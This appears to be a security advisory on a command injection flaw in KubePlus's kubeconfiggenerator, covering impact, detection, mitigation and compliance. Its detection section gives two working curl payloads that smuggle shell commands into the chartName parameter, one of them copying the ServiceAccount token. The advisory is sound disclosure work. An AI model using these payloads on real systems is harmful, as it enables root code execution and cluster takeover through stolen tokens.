Executive Summary

CVE-2026-29955 is a critical command injection vulnerability in the kubeconfiggenerator component of KubePlus (version 4.2.0 and earlier). It exists in the `/registercrd` HTTP endpoint where the `chartName` parameter is directly concatenated into shell commands executed with Python's subprocess.Popen() using `shell=True` without any sanitization or validation.

Because of this unsafe coding practice, an attacker can inject arbitrary shell commands by crafting a malicious `chartName` parameter value using shell command substitution syntax like `$(command)`.

This allows remote attackers with network access to the HTTP interface to execute arbitrary commands as root inside the container running kubeconfiggenerator.

Useful 0 Not Useful 0

Impact Analysis

This vulnerability can have severe impacts including:

• Remote Code Execution (RCE) allowing arbitrary commands to be run as root inside the container.
• Theft of sensitive credentials such as Kubernetes cluster-admin ServiceAccount tokens.
• Full cluster takeover by using stolen tokens to access and control the Kubernetes API with cluster-admin privileges.
• Lateral movement across all namespaces and resources within the Kubernetes cluster.

Useful 0 Not Useful 0

Detection Guidance

This vulnerability can be detected by monitoring the kubeconfiggenerator container logs for abnormal command execution patterns, especially commands involving shell command substitution syntax such as $(command).

Additionally, you can test for exploitation by sending crafted HTTP requests to the `/registercrd` endpoint with malicious `chartName` parameters that attempt to execute simple commands, such as creating a file inside the container.

• Example command to test command injection by creating a file `/tmp/pwned.txt` inside the container: curl -s 'http://localhost:5005/registercrd?kind=Test&version=v1&group=test.io&plural=tests&chartURL=https://example.com/test.tgz&chartName=$(id>/tmp/pwned.txt)'
• Verify the execution by checking for the presence of `/tmp/pwned.txt` inside the container.
• Another test command to check token theft possibility: curl -s 'http://localhost:5005/registercrd?kind=Test2&version=v1&group=test2.io&plural=test2s&chartURL=https://example.com/test.tgz&chartName=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token>/tmp/stolen-token.txt)'
• Then verify the stolen token file `/tmp/stolen-token.txt` inside the container.

Useful 0 Not Useful 0

Mitigation Strategies

Since no official patch is currently available, immediate mitigation steps include restricting network access to the vulnerable kubeconfighelper service and reducing privileges of the associated ServiceAccount.

• Use Kubernetes NetworkPolicy to restrict access to the kubeconfighelper HTTP service (default port 5005) to trusted sources only.
• Reduce the privileges of the `kubeplus-saas-provider` ServiceAccount to limit the potential impact if exploited.
• Monitor the kubeconfiggenerator container logs for abnormal or suspicious command execution patterns that may indicate exploitation attempts.

Useful 0 Not Useful 0

Compliance Impact

The CVE-2026-29955 vulnerability enables attackers to execute arbitrary commands as root inside the kubeconfiggenerator container and steal cluster-admin ServiceAccount tokens, leading to full control over the Kubernetes cluster.

This level of unauthorized access and control can result in exposure, modification, or deletion of sensitive data stored or processed within the cluster.

Such data breaches and unauthorized access can violate compliance requirements of common standards and regulations like GDPR and HIPAA, which mandate strict controls over data confidentiality, integrity, and access.

Therefore, exploitation of this vulnerability could lead to non-compliance with these regulations due to potential data breaches, unauthorized data access, and lack of adequate security controls.

Useful 0 Not Useful 0